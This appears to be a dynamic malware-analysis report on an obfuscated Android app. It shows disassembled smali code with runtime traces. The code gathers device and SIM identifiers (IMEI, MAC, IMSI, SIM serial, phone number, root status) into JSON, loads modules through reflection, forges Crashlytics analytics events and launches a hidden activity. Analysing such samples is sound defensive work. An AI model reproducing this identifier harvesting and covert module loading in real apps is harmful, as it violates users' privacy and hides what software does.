12iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->xnLvoQ:Lcom/czybg/eqtbdmzpklrgyns/qwAiT;
14iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->xnLvoQ:Lcom/czybg/eqtbdmzpklrgyns/qwAiT;
16invoke-static {v0}, Ljava/lang/Thread;->setDefaultUncaughtExceptionHandler(Ljava/lang/Thread$UncaughtExceptionHandler;)V
18const-string v0, "AD2"
20invoke-virtual {p1, v0, v3}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
21move-result-object v0
22iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->LmcGi:Landroid/content/SharedPreferences;
23new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/DxwHORco;
24new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/MgAuSw;
26invoke-direct {v1, p0}, Lcom/czybg/eqtbdmzpklrgyns/MgAuSw;-><init>(Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;)V
28invoke-direct {v0, p1, v1}, Lcom/czybg/eqtbdmzpklrgyns/DxwHORco;-><init>(Landroid/content/Context;Lcom/czybg/eqtbdmzpklrgyns/KUAcDFYW;)V
29iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->jVOak:Lcom/czybg/eqtbdmzpklrgyns/DxwHORco;
30new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;
32iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->DiXsQ:Landroid/content/Context;
33new-instance v2, Lcom/czybg/eqtbdmzpklrgyns/Grhkl;
35invoke-direct {v2, p0, p1}, Lcom/czybg/eqtbdmzpklrgyns/Grhkl;-><init>(Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;Landroid/content/Context;)V
37invoke-direct {v0, v1, v2}, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;-><init>(Landroid/content/Context;Lcom/czybg/eqtbdmzpklrgyns/OfsZk;)V
38iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;
40iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;
42invoke-virtual {v0, v3}, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->DiXsQ(Z)V
43return-void
Cross References
APIs
  • android.content.Intent.<init>
  • android.content.Intent.putExtra
  • android.content.Intent.setFlags
  • pvsaeqhpgq.zvsin.startActivity
Strings
  • computer
Position Instruction Meta Information
0new-instance v0, Landroid/content/Intent;
2iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->hZyMGHgz:Landroid/content/Context;
3const-class v2, Lcom/czybg/eqtbdmzpklrgyns/FooVJESlkd1K;
5invoke-direct {v0, v1, v2}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
7const-string v1, "computer"
8new-instance v2, Lcom/czybg/eqtbdmzpklrgyns/uIcqnrbS;
10invoke-direct {v2}, Lcom/czybg/eqtbdmzpklrgyns/uIcqnrbS;-><init>()V
12invoke-virtual {v0, v1, v2}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/io/Serializable;)Landroid/content/Intent;
  • Time: 56059
    • This:
      • Intent { cmp=com.czybg.eqtbdmzpklrgyns/.FooVJESlkd1K (has extras) }
    • p0: computer
    • p1: com.czybg.eqtbdmzpklrgyns.uIcqnrbS@3a498c13
    • Return:
      • Intent { cmp=com.czybg.eqtbdmzpklrgyns/.FooVJESlkd1K (has extras) }
13move-result-object v0
14const v1, 0x10008000
16invoke-virtual {v0, v1}, Landroid/content/Intent;->setFlags(I)Landroid/content/Intent;
18iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->hZyMGHgz:Landroid/content/Context;
20invoke-virtual {v1, v0}, Landroid/content/Context;->startActivity(Landroid/content/Intent;)V
  • Time: 56069
    • This:
      • pvsaeqhpgq.zvsin@15460b30
    • p0: Intent { cmp=com.czybg.eqtbdmzpklrgyns/.FooVJESlkd1K (has extras) }
21return-void
Cross References
APIs
  • java.lang.Object.<init>
  • com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ.getPackageName
  • android.content.Context.getSharedPreferences
Strings
  • com.czybg.eqtbdmzpklrgyns
Position Instruction Meta Information
1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
3invoke-virtual {p1}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
  • Time: 56097
    • This:
      • com.czybg.eqtbdmzpklrgyns.KezZERjCGv7fpQLHuQ@3447ad20
    • Return:
      • com.czybg.eqtbdmzpklrgyns
4move-result-object v0
5const/4 v1, 0x0
7invoke-virtual {p1, v0, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
8move-result-object v0
9iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ:Landroid/content/SharedPreferences;
10return-void
APIs
  • java.lang.Integer.valueOf
  • java.lang.Integer.intValue
Strings
  • 17
Position Instruction Meta Information
1sget-object v0, Landroid/os/Build$VERSION;->SDK:Ljava/lang/String;
  • Time: 56050
    • Return:
      • 17
3invoke-static {v0}, Ljava/lang/Integer;->valueOf(Ljava/lang/String;)Ljava/lang/Integer;
4move-result-object v0
6invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
7move-result v0
8const/16 v1, 0xe
9if-ge v0, v1, :cond_12
10const/4 v0, 0x1
11goto_f: sput-boolean v0, Lcom/czybg/eqtbdmzpklrgyns/YAIwLmyd;->DiXsQ:Z
12return-void
13cond_12: const/4 v0, 0x0
14goto/16 :goto_f

365 Non-Executed Methods

Cross References
APIs
  • org.json.JSONObject.<init>
  • org.json.JSONObject.put
  • org.json.JSONObject.<init>
  • org.json.JSONObject.put
Strings
  • PhoneInfo
  • DeviceImei
  • MacAddress
  • VersionCode
  • Language
  • AndroidId
  • PseudoId
  • AndroidSdk
  • IsRoot
  • Manufacturer
  • DeviceModel
  • ConnectType
  • NetworkType
  • NetworkGen
  • LocalTime
  • UnixTime
  • UserAgent
  • IsCanMeasure
  • SimInfo
  • NetworkCountryIso
  • NetworkOperatorName
  • NetworkOperatorCode
  • SimSerialNumber
  • SimCountryIso
  • SimOperatorCode
  • SimOperatorName
  • SimNumber
  • SimImsi
  • IsRoaming
  • AppInfo
Position Instruction Meta Information
0new-instance v0, Lorg/json/JSONObject;
2invoke-direct {v0}, Lorg/json/JSONObject;-><init>()V
4const-string v1, "PhoneInfo"
6iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;
7new-instance v3, Lorg/json/JSONObject;
9invoke-direct {v3}, Lorg/json/JSONObject;-><init>()V
11const-string v4, "DeviceImei"
13iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->DiXsQ:Ljava/lang/String;
15invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
17const-string v4, "MacAddress"
19iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->Odjrct:Ljava/lang/String;
21invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
23const-string v4, "VersionCode"
25iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->LmcGi:Ljava/lang/String;
27invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
29const-string v4, "Language"
31iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->hZyMGHgz:Ljava/lang/String;
33invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
35const-string v4, "AndroidId"
37iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->xnLvoQ:Ljava/lang/String;
39invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
41const-string v4, "PseudoId"
43iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->jVOak:Ljava/lang/String;
45invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
47const-string v4, "AndroidSdk"
48iget v5, v2, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->CyGFDR:I
50invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;I)Lorg/json/JSONObject;
52const-string v4, "IsRoot"
53iget-boolean v5, v2, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->EZmcnv:Z
55invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Z)Lorg/json/JSONObject;
57const-string v4, "Manufacturer"
59iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->phHwgb:Ljava/lang/String;
61invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
63const-string v4, "DeviceModel"
65iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->uKFQsLn:Ljava/lang/String;
67invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
69const-string v4, "ConnectType"
71iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->lVfyLT:Ljava/lang/String;
73invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
75const-string v4, "NetworkType"
77iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->xfPEz:Ljava/lang/String;
79invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
81const-string v4, "NetworkGen"
83iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->IwTvjRW:Ljava/lang/String;
85invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
87const-string v4, "LocalTime"
89iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->DoHnmwOG:Ljava/lang/String;
91invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
93const-string v4, "UnixTime"
94iget-wide v5, v2, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->FySkt:J
96invoke-virtual {v3, v4, v5, v6}, Lorg/json/JSONObject;->put(Ljava/lang/String;J)Lorg/json/JSONObject;
98const-string v4, "UserAgent"
100iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->TikzFyJI:Ljava/lang/String;
102invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
104const-string v4, "IsCanMeasure"
105iget v2, v2, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;->ciatqPxI:I
107invoke-virtual {v3, v4, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;I)Lorg/json/JSONObject;
109invoke-virtual {v0, v1, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
111const-string v1, "SimInfo"
113iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->Odjrct:Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;
114new-instance v3, Lorg/json/JSONObject;
116invoke-direct {v3}, Lorg/json/JSONObject;-><init>()V
118const-string v4, "NetworkCountryIso"
120iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->DiXsQ:Ljava/lang/String;
122invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
124const-string v4, "NetworkOperatorName"
126iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->Odjrct:Ljava/lang/String;
128invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
130const-string v4, "NetworkOperatorCode"
132iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->LmcGi:Ljava/lang/String;
134invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
136const-string v4, "SimSerialNumber"
138iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->CyGFDR:Ljava/lang/String;
140invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
142const-string v4, "SimCountryIso"
144iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->hZyMGHgz:Ljava/lang/String;
146invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
148const-string v4, "SimOperatorCode"
150iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->xnLvoQ:Ljava/lang/String;
152invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
154const-string v4, "SimOperatorName"
156iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->jVOak:Ljava/lang/String;
158invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
160const-string v4, "SimNumber"
162iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->phHwgb:Ljava/lang/String;
164invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
166const-string v4, "SimImsi"
168iget-object v5, v2, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->EZmcnv:Ljava/lang/String;
170invoke-virtual {v3, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
172const-string v4, "IsRoaming"
173iget-boolean v2, v2, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;->uKFQsLn:Z
175invoke-virtual {v3, v4, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Z)Lorg/json/JSONObject;
177invoke-virtual {v0, v1, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
179const-string v1, "AppInfo"
181iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;
183invoke-virtual {v2}, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->DiXsQ()Lorg/json/JSONObject;
184move-result-object v2
186invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
187return-object v0
Cross References
APIs
  • java.util.concurrent.ConcurrentHashMap.entrySet
  • java.util.Set.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.util.Map$Entry.getKey
  • java.lang.Integer.intValue
  • java.util.Map$Entry.getValue
  • java.lang.Integer.valueOf
  • java.util.concurrent.ConcurrentHashMap.containsKey
  • java.lang.Integer.valueOf
  • android.util.Pair.<init>
  • java.util.concurrent.ConcurrentHashMap.put
  • java.lang.Integer.valueOf
  • java.util.concurrent.ConcurrentHashMap.get
  • java.lang.Object.getClass
  • java.lang.Class.getMethod
  • java.lang.reflect.Method.invoke
  • java.lang.StringBuilder.<init>
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • java.lang.Object.getClass
  • java.lang.Class.getDeclaredField
  • java.lang.reflect.Field.setAccessible
  • java.lang.reflect.Field.get
  • java.lang.Class.forName
  • java.lang.Class.getDeclaredConstructors
  • java.lang.reflect.Constructor.setAccessible
  • java.lang.Integer.valueOf
  • java.lang.reflect.Constructor.newInstance
  • java.lang.Object.getClass
  • java.lang.Class.forName
  • java.lang.Class.getDeclaredMethod
  • com.czybg.eqtbdmzpklrgyns.FooVJESlkd1K.<init>
  • java.lang.reflect.Method.invoke
  • java.lang.Object.getClass
  • java.lang.Class.getDeclaredField
  • java.lang.reflect.Field.setAccessible
  • java.lang.reflect.Field.get
  • java.lang.Object.getClass
  • java.lang.Class.getMethod
  • java.lang.reflect.Method.invoke
  • android.content.SharedPreferences.getString
  • java.lang.String.equals
  • com.czybg.eqtbdmzpklrgyns.UBLcF.<init>
  • android.os.AsyncTask.executeOnExecutor
  • android.os.AsyncTask.execute
  • android.content.SharedPreferences.getString
Strings
  • start
  • moduleId
  • analyticsManager
  • mpcom.crashlytics.android.answers.SessionEvent$Type
  • START
  • onLifecycle
  • eventsHandler
  • flushEvents
  • snt
Position Instruction Meta Information
0const/4 v12, 0x1
1const/4 v11, 0x0
3iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->hZyMGHgz:Ljava/util/concurrent/ConcurrentHashMap;
5invoke-virtual {v0}, Ljava/util/concurrent/ConcurrentHashMap;->entrySet()Ljava/util/Set;
6move-result-object v0
8invoke-interface {v0}, Ljava/util/Set;->iterator()Ljava/util/Iterator;
9move-result-object v2
10cond_c:
11invoke-interface {v2}, Ljava/util/Iterator;->hasNext()Z
12move-result v0
13if-eqz v0, :cond_ae
15invoke-interface {v2}, Ljava/util/Iterator;->next()Ljava/lang/Object;
16move-result-object v0
17check-cast v0, Ljava/util/Map$Entry;
19invoke-interface {v0}, Ljava/util/Map$Entry;->getKey()Ljava/lang/Object;
20move-result-object v1
21check-cast v1, Ljava/lang/Integer;
23invoke-virtual {v1}, Ljava/lang/Integer;->intValue()I
24move-result v1
26invoke-interface {v0}, Ljava/util/Map$Entry;->getValue()Ljava/lang/Object;
27move-result-object v0
28check-cast v0, Lcom/czybg/eqtbdmzpklrgyns/Module;
29try_start_28:
30iget-object v3, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->DoHnmwOG:Ljava/util/concurrent/ConcurrentHashMap;
32invoke-static {v1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
33move-result-object v4
35invoke-virtual {v3, v4}, Ljava/util/concurrent/ConcurrentHashMap;->containsKey(Ljava/lang/Object;)Z
36move-result v3
37if-nez v3, :cond_63
39iget-object v3, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->DoHnmwOG:Ljava/util/concurrent/ConcurrentHashMap;
41invoke-static {v1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
42move-result-object v4
44iget-object v5, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->jVOak:Landroid/content/Context;
45const/4 v6, 0x2
46new-array v6, v6, [Landroid/util/Pair;
47const/4 v7, 0x0
48new-instance v8, Landroid/util/Pair;
49const-class v9, Ljava/lang/String;
51iget-object v10, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->LmcGi:Ljava/lang/String;
53invoke-direct {v8, v9, v10}, Landroid/util/Pair;-><init>(Ljava/lang/Object;Ljava/lang/Object;)V
54aput-object v8, v6, v7
55const/4 v7, 0x1
56new-instance v8, Landroid/util/Pair;
57const-class v9, Ljava/lang/String;
59iget-object v10, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->Odjrct:Ljava/lang/String;
61invoke-direct {v8, v9, v10}, Landroid/util/Pair;-><init>(Ljava/lang/Object;Ljava/lang/Object;)V
62aput-object v8, v6, v7
64invoke-virtual {v0, v5, v6}, Lcom/czybg/eqtbdmzpklrgyns/Module;->service(Landroid/content/Context;[Landroid/util/Pair;)Lcom/czybg/eqtbdmzpklrgyns/fQuMyR;
65move-result-object v5
67invoke-virtual {v3, v4, v5}, Ljava/util/concurrent/ConcurrentHashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
69iget-object v3, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->VvXSDk:Lcom/czybg/eqtbdmzpklrgyns/ECaKFvg;
71invoke-virtual {v0, v3}, Lcom/czybg/eqtbdmzpklrgyns/Module;->setApiListener(Lcom/czybg/eqtbdmzpklrgyns/ECaKFvg;)V
72cond_63:
73iget-object v3, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->DoHnmwOG:Ljava/util/concurrent/ConcurrentHashMap;
75invoke-static {v1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
76move-result-object v1
78invoke-virtual {v3, v1}, Ljava/util/concurrent/ConcurrentHashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
79move-result-object v1
80check-cast v1, Lcom/czybg/eqtbdmzpklrgyns/fQuMyR;
81iget-boolean v3, v1, Lcom/czybg/eqtbdmzpklrgyns/fQuMyR;->Odjrct:Z
82if-nez v3, :cond_c
84iget-object v3, v1, Lcom/czybg/eqtbdmzpklrgyns/fQuMyR;->DiXsQ:Ljava/lang/Object;
86invoke-virtual {v3}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
87move-result-object v3
89const-string v4, "start"
90const/4 v5, 0x0
91new-array v5, v5, [Ljava/lang/Class;
93invoke-virtual {v3, v4, v5}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
94move-result-object v3
96iget-object v4, v1, Lcom/czybg/eqtbdmzpklrgyns/fQuMyR;->DiXsQ:Ljava/lang/Object;
97const/4 v5, 0x0
98new-array v5, v5, [Ljava/lang/Object;
100invoke-virtual {v3, v4, v5}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
101const/4 v3, 0x1
102iput-boolean v3, v1, Lcom/czybg/eqtbdmzpklrgyns/fQuMyR;->Odjrct:Z
103try_end_8d: goto/16 :goto_c
104catch_8f: move-exception v1
106invoke-virtual {p0, v0}, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/Module;)V
108const-string v3, "moduleId"
109new-instance v4, Ljava/lang/StringBuilder;
111invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
113iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/Module;->info:Lcom/czybg/eqtbdmzpklrgyns/qaNho;
114iget v0, v0, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->DiXsQ:I
116invoke-virtual {v4, v0}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
117move-result-object v0
119invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
120move-result-object v0
122invoke-static {v3, v0}, Lmpcom/crashlytics/android/Crashlytics;->setString(Ljava/lang/String;Ljava/lang/String;)V
124invoke-static {v1}, Lmpcom/crashlytics/android/Crashlytics;->logException(Ljava/lang/Throwable;)V
125goto/16 :goto_c
126cond_ae:
127iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->FySkt:Lcom/czybg/eqtbdmzpklrgyns/LmcGi;
129invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->LmcGi()Z
130move-result v0
131if-nez v0, :cond_b7
132cond_b6: return-void
133cond_b7:
134invoke-static {}, Lmpcom/crashlytics/android/answers/Answers;->getInstance()Lmpcom/crashlytics/android/answers/Answers;
135move-result-object v0
137invoke-virtual {v0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
138move-result-object v0
140const-string v1, "analyticsManager"
142invoke-virtual {v0, v1}, Ljava/lang/Class;->getDeclaredField(Ljava/lang/String;)Ljava/lang/reflect/Field;
143move-result-object v0
144const/4 v1, 0x1
146invoke-virtual {v0, v1}, Ljava/lang/reflect/Field;->setAccessible(Z)V
148invoke-static {}, Lmpcom/crashlytics/android/answers/Answers;->getInstance()Lmpcom/crashlytics/android/answers/Answers;
149move-result-object v1
151invoke-virtual {v0, v1}, Ljava/lang/reflect/Field;->get(Ljava/lang/Object;)Ljava/lang/Object;
152move-result-object v0
154const-string v1, "mpcom.crashlytics.android.answers.SessionEvent$Type"
156invoke-static {v1}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
157move-result-object v1
159invoke-virtual {v1}, Ljava/lang/Class;->getDeclaredConstructors()[Ljava/lang/reflect/Constructor;
160move-result-object v1
161const/4 v2, 0x0
162aget-object v1, v1, v2
163const/4 v2, 0x1
165invoke-virtual {v1, v2}, Ljava/lang/reflect/Constructor;->setAccessible(Z)V
166const/4 v2, 0x2
167new-array v2, v2, [Ljava/lang/Object;
168const/4 v3, 0x0
170const-string v4, "START"
171aput-object v4, v2, v3
172const/4 v3, 0x1
173const/4 v4, 0x0
175invoke-static {v4}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
176move-result-object v4
177aput-object v4, v2, v3
179invoke-virtual {v1, v2}, Ljava/lang/reflect/Constructor;->newInstance([Ljava/lang/Object;)Ljava/lang/Object;
180move-result-object v1
182invoke-virtual {v0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
183move-result-object v2
185const-string v3, "onLifecycle"
186const/4 v4, 0x2
187new-array v4, v4, [Ljava/lang/Class;
188const/4 v5, 0x0
189const-class v6, Landroid/app/Activity;
190aput-object v6, v4, v5
191const/4 v5, 0x1
193const-string v6, "mpcom.crashlytics.android.answers.SessionEvent$Type"
195invoke-static {v6}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
196move-result-object v6
197aput-object v6, v4, v5
199invoke-virtual {v2, v3, v4}, Ljava/lang/Class;->getDeclaredMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
200move-result-object v2
201const/4 v3, 0x2
202new-array v3, v3, [Ljava/lang/Object;
203const/4 v4, 0x0
204new-instance v5, Lcom/czybg/eqtbdmzpklrgyns/FooVJESlkd1K;
206invoke-direct {v5}, Lcom/czybg/eqtbdmzpklrgyns/FooVJESlkd1K;-><init>()V
207aput-object v5, v3, v4
208const/4 v4, 0x1
209aput-object v1, v3, v4
211invoke-virtual {v2, v0, v3}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
213invoke-virtual {v0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
214move-result-object v1
216const-string v2, "eventsHandler"
218invoke-virtual {v1, v2}, Ljava/lang/Class;->getDeclaredField(Ljava/lang/String;)Ljava/lang/reflect/Field;
219move-result-object v1
220const/4 v2, 0x1
222invoke-virtual {v1, v2}, Ljava/lang/reflect/Field;->setAccessible(Z)V
224invoke-virtual {v1, v0}, Ljava/lang/reflect/Field;->get(Ljava/lang/Object;)Ljava/lang/Object;
225move-result-object v0
227invoke-virtual {v0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
228move-result-object v1
230const-string v2, "flushEvents"
231const/4 v3, 0x0
232new-array v3, v3, [Ljava/lang/Class;
234invoke-virtual {v1, v2, v3}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
235move-result-object v1
236const/4 v2, 0x0
237new-array v2, v2, [Ljava/lang/Object;
239invoke-virtual {v1, v0, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
240goto_147:
241iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->EZmcnv:Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
243invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->Odjrct()Lcom/czybg/eqtbdmzpklrgyns/phHwgb;
244move-result-object v0
245if-eqz v0, :cond_155
247invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;->DiXsQ()Z
248move-result v0
249if-nez v0, :cond_1a4
250cond_155: iget-boolean v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->phHwgb:Z
251if-nez v0, :cond_b6
252iput-boolean v12, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->phHwgb:Z
254iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->TikzFyJI:Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;
255new-instance v1, Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;
257invoke-direct {v1, p0}, Lcom/czybg/eqtbdmzpklrgyns/rDQYNd;-><init>(Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;)V
258iput-object v1, v0, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/iUhPN;
260iget-object v2, v0, Lcom/czybg/eqtbdmzpklrgyns/VvXSDk;->Odjrct:Landroid/content/SharedPreferences;
262const-string v3, "snt"
